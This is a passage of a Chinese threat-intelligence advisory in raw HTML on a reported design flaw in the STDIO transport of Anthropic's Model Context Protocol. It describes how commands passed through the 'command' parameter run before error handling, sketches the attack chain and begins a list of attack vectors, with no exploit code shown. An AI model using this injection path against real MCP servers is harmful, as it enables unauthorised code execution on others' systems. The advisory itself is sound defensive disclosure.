  <h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">威胁概览</span></h2><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心监测发现，安全研究机构Ox Security于2026年4月披露了Anthropic公司Model Context Protocol（MCP）协议中存在的<span textstyle="" style="font-weight: bold;">架构级设计缺陷</span>。该漏洞根植于MCP协议的STDIO传输机制，攻击者可利用此缺陷实现未授权命令注入与远程代码执行（RCE），受影响系统规模超过<span textstyle="" style="font-weight: bold;">20万台服务器</span>，相关SDK累计下载量突破<span textstyle="" style="font-weight: bold;">1.5亿次</span>。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">威胁定性：高危（Critical）</span></span></p><table style="box-sizing: border-box;border-width: 0px;border-style: solid;border-color: inherit;border-image: initial;margin-top: 0px !important;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);text-indent: 0px;border-collapse: collapse;border-spacing: 0px;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><thead><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">评估维度</span></p></th><th style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">详情</span></p></th></tr></thead><tbody><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">漏洞类型</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">架构设计缺陷导致的命令注入与RCE</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">影响范围</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">20万+服务器，150M+SDK下载，7000+公开MCP实例</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">利用难度</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">低（无需高级技术背景）</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">攻击前提</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">低（部分场景为零点击利用）</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">厂商态度</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">拒绝修复，定性为&#34;预期行为&#34;</span></p></td></tr><tr style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);"><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">已披露CVE</span></strong></td><td style="box-sizing: border-box;border: 1px solid rgb(223, 223, 223);margin: 0px;padding: 0.25em 0.5em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);color: rgb(10, 10, 10);word-break: keep-all;text-align: left;"><p><span leaf="">10+（高危/严重级别）</span></p></td></tr></tbody></table><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">从威胁情报角度评估，该漏洞已非单一产品安全事件，而是演变为<span textstyle="" style="font-weight: bold;">AI基础设施层面的系统性供应链风险</span>。Anthropic作为AI领域头部企业，其主导协议的架构缺陷将对整个AI开发生态产生深远影响。</span></p><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">技术根因剖析</span></h2><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MCP协议与STDIO传输机制</span></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Model Context Protocol（MCP）是Anthropic于2024年11月发布的开源协议，旨在为大型语言模型（LLM）、AI应用和智能代理提供连接外部数据源、系统和服务统一接口。该协议支持多编程语言实现，包括Python、TypeScript、Java和Rust，覆盖当前主流AI开发技术栈。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">核心问题</span></span><span leaf="" style="letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;">在于MCP采用STDIO（标准输入/输出）作为本地传输机制。当AI应用需要调用MCP服务器时，协议设计允许以子进程形式启动MCP服务器，并通过STDIO进行进程间通信。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong><span leaf="">漏洞本质</span></strong><span leaf="" style="letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;">：STDIO传输层的设计逻辑存在根本性缺陷。当通过&#34;command&#34;参数传入任意</span><span leaf="" style="letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;">操作</span><span leaf="" style="letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;">系统命令时，该命令</span><strong><span leaf="">无论进程是否成功启动都会被执行</span></strong><span leaf="">。具体表现为：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="">若命令成功创建STDIO服务器，则返回句柄供后续使用</span></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><span leaf="">若命令执行失败，仍会在收到错误响应<span textstyle="" style="font-weight: bold;">之前</span>完成命令执行</span></p></li></ul></ul><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这种&#34;先执行、后验证&#34;的行为模式，使攻击者可以在进程启动阶段注入恶意命令，利用命令执行到错误返回之间的时间窗口完成攻击。</span></p><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击链技术解析</span></h3><pre style="font-size: 14.4px;overflow-x: auto;border-radius: 8px;line-height: 1.5;margin: 10px 8px;padding: 0px !important;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="font-size: 12.96px;color: inherit;background: none;padding: 0.5em 1em 1em;border-radius: 4px;display: -webkit-box;overflow-x: auto;text-indent: 0px;white-space: nowrap;margin: 0px;"><span leaf="">攻击者输入 → STDIO传输层 → 命令执行（无认证/无清理） → 系统接管 ↓ [漏洞触发] ↓ 返回错误信息（此时命令已执行完毕）</span></code></pre><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该攻击链具备以下特征：</span></p><ul style="list-style: circle;padding-left: 1em;margin-left: 0px;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"></ul><ol style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px 0px 0px 1em;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);list-style: none;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">1. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">时间窗口利用</span></strong><span leaf="">：命令执行发生在STDIO错误处理流程之前</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">2. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">认证绕过</span></strong><span leaf="">：STDIO传输层本身不包含认证机制</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">3. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">清理失效</span></strong><span leaf="">：开发者层面的输入清理无法触及协议底层执行逻辑</span></p></li><li style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0.2em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);display: block;color: rgb(10, 10, 10);"><p><span leaf="">4. </span><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">跨平台影响</span></strong><span leaf="">：影响所有使用官方SDK的项目（Python/TypeScript/Java/Rust）</span></p></li></ol><h2 style="padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">四大攻击向量深度分析</span></h2><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(0, 0, 0);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报团队根据Ox Security研究报告，对该漏洞衍生的攻击向量进行系统性梳理：</span></p><h3 style="display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击向量一：未授权命令注入</span></h3><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);font-weight: bold;color: rgb(51, 51, 51);font-size: inherit;"><span leaf="">技术描述</span></strong><span leaf="">：STDIO传输机制允许攻击者直接注入任意操作系统命令，命令以服务器端执行权限运行，无需任何认证或输入清理。</span></p><p style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 1.5em 8px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 0.5);letter-spacing: 0.1em;color: rgb(10, 10, 10);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="box-sizing: border-box;border: 0px solid rgb(229, 229, 229);margin: 0px;padding: 0px;outline-color: oklab(0.144521 0.00000657141 0.00000288337 / 